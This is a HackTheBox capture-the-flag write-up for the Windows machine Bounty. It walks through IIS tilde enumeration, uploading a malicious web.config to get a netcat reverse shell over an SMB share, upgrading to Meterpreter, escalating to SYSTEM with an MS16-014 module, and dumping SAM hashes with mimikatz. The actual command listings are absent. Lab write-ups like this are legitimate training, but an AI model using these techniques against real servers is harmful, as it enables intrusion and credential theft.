HackTheBox - Bounty - 10.10.10.93
Bounty is an easy rated Windows Server 2008 R2 machine on hackthebox.eu.
Bounty is an easy to medium difficulty machine, which features an interesting technique to bypass file uploader protections and achieve code execution. This machine also highlights the importance of keeping systems updated with the latest security patches.
Recon and Scanning
From the ports shown here I can see that this is a Windows Box running IIS 7.5, meaning that we are dealing with a Windows Server 2008 R2 box.
As IIS is the only port open we should start there, also, as this is a very outdated version of IIS we can assume that it may be vulnerable to a this, which is a flaw that may lead to an unauthorized information disclosure. The issue is triggered during the parsing of a request that contains a tilde character (~). This may allow a remote attacker to gain access to file and folder name information. We can use this script to figure out if it is vulnerable and to find any hidden file or directories.
The syntax of the command to find out if the IIS version in question is vulnerable is:
Now that we know the IIS server is vulnerable we can run the following command to enumerate hidden files and directories:
Custom Wordlist and GoBuster
Bingo! We have identified two files or directories starting with
upload, therefore we can grep a directory list for the phrases and create a custom wordlist to use with gobuster.
Now that we have a custom wordlist called
words we can run gobuster, we also know that as this is an IIS Server we should also fuzz for files with a
Nice, we have identified an
uploadedfiles directory and the
Getting a Shell with a web.config file
Now that we know there is a page where we can upload files, we can attempt to get a shell using an IIS webshell.
We can also guess that as this is an outdated IIS server we can probably use a web.config payload to get a shell. As the web.config file is not in an aspx format, rather in XML, it is much harder to block by AV. As the
web.config file is similar to Apache’s
.htaccess file, it stores important settings, this means we can inject malicious code into the file and get execution. This article explains it very well.
Creating a Malicious File
Firstly we will need to copy a malicious web.config file from here, then we will need to insert code to run a nc reverse shell.
We will also need to start an smb server to run nc remotely. This can be done using the Impacket
Popping a Shell
Now we can head over to
transfer.aspx page and upload our malicious
web.config file, whilst also starting an nc listener. Then we can go to
Bingo! We got a shell!
Upgrading to a Meterpreter Session
Now that we have a shell, we can generate a meterpreter payload and upgrade to a meterpreter session. Firstly, we need to generate a meterpreter payload and host it on out SMB server.
Generating a Meterpreter EXE Payload
Now that we have a payload, let’s setup a listener in Metasploit.
Getting a Meterpreter Session
Now that the listener and payload are ready, we can run it from our smb share.
Bingo! Now that we have a meterpreter session we can attempt to privesc.
Privilege Escalation to SYSTEM
As this is a stock
Windows Server 2008 R2 machine we should run the local exploit suggester module within metasploit.
Post Local Exploit Suggester
exploit/windows/local/ms16_014_wmi_recv_notif looks promising so let’s try this
Let’s load up this module as set the following options:
- LHOST - 10.10.14.15
- LPORT - 4444
- SESSION - 1
Bingo, we got a shell as SYSTEM!
User and Root Flags
Now that we have a shell as system, we can grab both the user and root flags
Now that we have rooted the machine we can load mimikatz and dump the SAM hashes
If you enjoyed the write up or found it useful consider + repping my htb profile linked below: